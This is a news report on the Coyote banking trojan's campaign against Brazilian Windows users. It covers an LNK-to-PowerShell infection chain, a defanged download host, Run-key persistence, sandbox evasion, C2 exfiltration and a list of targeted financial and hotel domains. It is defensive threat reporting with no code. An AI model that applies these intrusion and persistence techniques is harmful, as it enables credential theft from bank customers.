A sinister banking malware identified as Coyote has emerged as a formidable cyber threat, with its latest incursion primarily targeting Windows users in Brazil.
“Once activated, the Coyote Banking Trojan exhibits a diverse arsenal of malicious capabilities, including keystroke logging, surreptitious screen capture, and the deployment of deceptive overlays designed to pilfer sensitive credentials,” explained Cara Lin, a cybersecurity researcher at Fortinet FortiGuard Labs, in a recent analysis.
Evolution of the Attack Vector
Over the last month, cybersecurity analysts have uncovered multiple Windows Shortcut (LNK) file variants embedded with PowerShell commands, which serve as conduits for delivering the insidious malware.
Initially dissected by Kaspersky in early 2024, Coyote was observed orchestrating incursions against users in South America, demonstrating its adeptness at exfiltrating confidential data from over 70 financial applications.
In its prior attack methodology, a Squirrel installer executable acted as the catalyst, initiating a Node.js-based application—crafted via Electron—which subsequently invoked a Nim-constructed loader to unleash the malicious Coyote payload.
However, in its latest iteration, the infection process pivots to an LNK file that executes a PowerShell command, facilitating the retrieval of a secondary-stage payload from a remote server (“tbet.geontrigame[.]com”). This, in turn, triggers another PowerShell script, which activates an intermediary loader, responsible for executing an encoded payload.
Technical Modus Operandi
“The injected code utilizes Donut, a sophisticated framework engineered to decrypt and execute Microsoft Intermediate Language (MSIL) payloads,” Lin detailed. “Upon decryption, the MSIL binary establishes persistent system presence by modifying registry keys within 'HCKU\Software\Microsoft\Windows\CurrentVersion\Run'
.”
Once the malware detects an existing registry entry, it eradicates it and replaces it with a newly generated entry under a randomized moniker. This newly embedded registry key is programmed to execute a Base64-encoded PowerShell command, which orchestrates the retrieval and execution of the primary Coyote banking Trojan.
Stealth, Evasion, and Data Exfiltration
Upon successful infiltration, Coyote undertakes a meticulous reconnaissance process—cataloging system specifications and identifying installed antivirus solutions. The harvested data is Base64-encoded and stealthily transmitted to a remote command-and-control (C2) server.
In parallel, the malware deploys advanced anti-analysis mechanisms, actively scrutinizing its execution environment to sidestep detection by sandboxing technologies and virtual machine environments.
Widened Scope of Targeted Entities
One of the most alarming enhancements in this latest Coyote campaign is the malware’s expanded list of targets, now encompassing 1,030 domains and 73 financial institutions. Among these are notable entities such as:
- mercadobitcoin.com.br
- bitcointrade.com.br
- foxbit.com.br
- augustoshotel.com.br
- blumenhotelboutique.com.br
- fallshotel.com.br
If a victim attempts to access any of these pre-defined websites, the malware initiates server-side communication with an attacker-controlled infrastructure, determining the appropriate course of action. Depending on the adversary’s directive, this could entail screenshot capture, overlay injection, keystroke logging, or manipulative display alterations.
Conclusion: A Grave Financial Cybersecurity Threat
“The infection chain behind Coyote is intricate, comprising multiple-stages to ensure obfuscation and persistence,” Lin remarked. “The latest attack wave leverages an LNK file as the primary infiltration vector, which ultimately reveals a complex matrix of additional malicious artifacts. This Trojan remains a serious menace to financial cybersecurity, particularly given its ability to scale its operations beyond its initial sphere of influence.”
Cybersecurity professionals emphasize the urgent necessity of implementing proactive defense mechanisms, including behavior-based anomaly detection, stringent endpoint security policies, and continuous network monitoring, to thwart Coyote’s relentless expansion.